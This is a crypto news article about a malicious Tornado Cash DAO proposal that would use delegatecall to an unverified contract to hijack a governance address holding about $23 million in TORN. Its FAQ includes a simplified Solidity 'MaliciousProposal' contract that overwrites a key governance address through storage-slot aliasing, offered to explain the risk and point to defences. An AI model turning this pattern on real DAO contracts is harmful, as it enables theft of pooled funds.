Researcher: Malicious proposal appears in Tornado Cash DAO, TORN holders should reject


L2BEAT researcher Sergey Shemyakov posted on X on June 25, warning of a suspicious governance proposal in the Tornado Cash DAO: the target contract is unverified, and the proposer address received funds via Railgun. A Security Alliance researcher analyzed the proposal and concluded that it aims to hand the attacker control of the governance address holding approximately $23 million worth of TORN tokens.

Technical Features of the Suspicious Proposal: Unverified Target Contract, Railgun Fund Source

Tornado Cash DAO malicious proposal (Source: Sergey Shemyakov)

Shemyakov listed three specific warnings in his post:

First, the target contract is unverified on Etherscan, which is "highly unusual" for Tornado Cash DAO proposals;

Second, if passed, the governance contract would delegatecall the target contract (delegatecall runs the target's code with the governance contract's own storage, balance and address, so the target can rewrite any governance state; a high-risk operation);

Third, the proposal creator address received funds via Railgun 4 days ago, while Railgun is a competing privacy protocol to Tornado Cash.

The proposal superficially claims to define a new fee structure and "establish a completely new dynamic deflationary economic model," but security researchers believe this is merely a cover.

Caversaccio's Analysis: Fake Address Replacement, $23 Million TORN Target

Pascal Caversaccio analyzed the proposal's true intent in detail:

· The proposal would replace a key address in the DAO governance contract with a fake address controlled by the attacker, where the first 15 characters are identical to the existing address (visually hard to distinguish);

· After replacement, the attacker would control the DAO governance address currently holding approximately $23 million worth of TORN tokens;

· A similar replacement would also be applied to the staking governance proxy contract;

· The fake governance address could also "arbitrarily clear the balance of any relayer."

Caversaccio urged all TORN holders to reject the proposal.

Tornado Cash Governance Attack History: Lessons from 2023

This is not the first time Tornado Cash has faced a malicious governance proposal. In 2023, a malicious proposal successfully passed, giving the attacker majority voting control; the attacker swapped approximately $800,000 worth of TORN tokens for ETH, then attempted to propose resetting TORN voting power to zero, and laundered the proceeds through Tornado Cash.

Additionally, multiple IPFS front-ends of Tornado Cash were injected with malicious JavaScript code, leading to leakage of sensitive deposit information.

On the legal front, Tornado Cash was sanctioned by the U.S. Treasury in 2022, with the sanctions lifted last year; developer Roman Storm was indicted last year for conspiracy to operate an unlicensed money transmitting business, and a motion for acquittal filed in April this year remains undecided, leaving his fate uncertain.

Frequently Asked Questions

Why is an "unverified target contract" a major red flag in Tornado Cash DAO?

According to Shemyakov, Tornado Cash DAO proposals have historically used verified (open-source) contracts, allowing the community and researchers to review the proposal's actual functionality. An unverified contract means its code cannot be directly viewed and can only be analyzed through decompilation (reverse engineering), greatly increasing the difficulty of identifying malicious logic, and is therefore extremely rare in normal governance processes.

What is the danger of a delegatecall attack?

delegatecall is a low-level call in Ethereum smart contracts that runs the called contract's code in the storage context of the caller (here, the governance contract), with the caller's address and balance. This means that if the target contract contains malicious code, a single execution can modify any state held by the governance contract, including token balances and key addresses, and nothing in the contract rolls such changes back once the transaction is mined.
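To make the delegatecall point concrete (this answer, Shemyakov's second warning, and Caversaccio's address-replacement finding above), here is an added, hypothetical Solidity illustration. It is not Tornado Cash's governance code: the contract names, the `executeProposal()` entry point, the storage layout and the `treasury` field are assumptions chosen for the example. It shows how a proposal contract that merely declares the same first storage slot as the governance contract can overwrite a key address when it is delegatecalled.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Hypothetical, simplified DAO governance contract (example code, not Tornado Cash's).
// Storage layout: slot 0 = a key address the DAO relies on, slot 1 = proposal counter.
contract Governance {
    address public treasury;      // slot 0: key address (assumed name)
    uint256 public proposalCount; // slot 1

    constructor(address initialTreasury) {
        treasury = initialTreasury;
    }

    // Executes a passed proposal. Many DAOs do exactly this: the proposal
    // contract is delegatecalled, so its code runs with THIS contract's
    // storage, balance and address. Whatever the proposal writes to its own
    // "slot 0" lands in Governance.treasury.
    function execute(address proposal) external {
        (bool ok, ) = proposal.delegatecall(
            abi.encodeWithSignature("executeProposal()")
        );
        require(ok, "proposal failed");
        proposalCount++;
    }
}

// What an honest proposal looks like: it still runs via delegatecall, but only
// touches state it declares honestly (a fee parameter at a fresh slot would be
// laid out to match the real governance contract; here we keep it minimal).
contract HonestProposal {
    address private _slot0Unused; // keeps slot 0 untouched on purpose
    uint256 private _slot1Unused; // keeps slot 1 untouched on purpose
    uint256 public fee;           // slot 2: a new parameter, not a key address

    function executeProposal() external {
        fee = 30; // e.g. 0.3% in basis points; illustrative value only
    }
}

// Malicious proposal: its first declared variable aliases Governance.treasury.
// `attacker` is immutable, so it lives in the proposal's bytecode rather than in
// storage and is read correctly even during the delegatecall; `treasury`, being
// a storage write to slot 0, overwrites the governance contract's key address.
contract MaliciousProposal {
    address public treasury;             // slot 0, aliasing Governance.treasury
    address private immutable attacker;  // set at deployment, stored in code

    constructor() {
        attacker = msg.sender;
    }

    function executeProposal() external {
        // After Governance.execute(address(this)) runs, Governance.treasury
        // equals `attacker`, while Governance's own code never changed.
        treasury = attacker;
    }
}
```

Reviewing the proposal's verified source, comparing its storage layout against the governance contract's, and checking every address it writes character by character against the expected value are the practical defences this example points at; an unverified target removes the first two checks entirely, which is why Shemyakov flagged it.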

Is Tornado Cash's mixer pool itself safe?

According to Shemyakov's explanation, Tornado Cash's mixing pool itself is not affected by this proposal; the pool is secure. The target of this proposal is the Tornado Cash DAO governance contract itself—the contract that manages organizational decisions—not the anonymity function contracts accessed by users.

Disclaimer: The information on this page may come from third-party sources and is for reference only. It does not represent the views or opinions of Gate and does not constitute any financial, investment, or legal advice. Virtual asset trading involves high risk. Please do not rely solely on the information on this page when making decisions. For details, see the Disclaimer.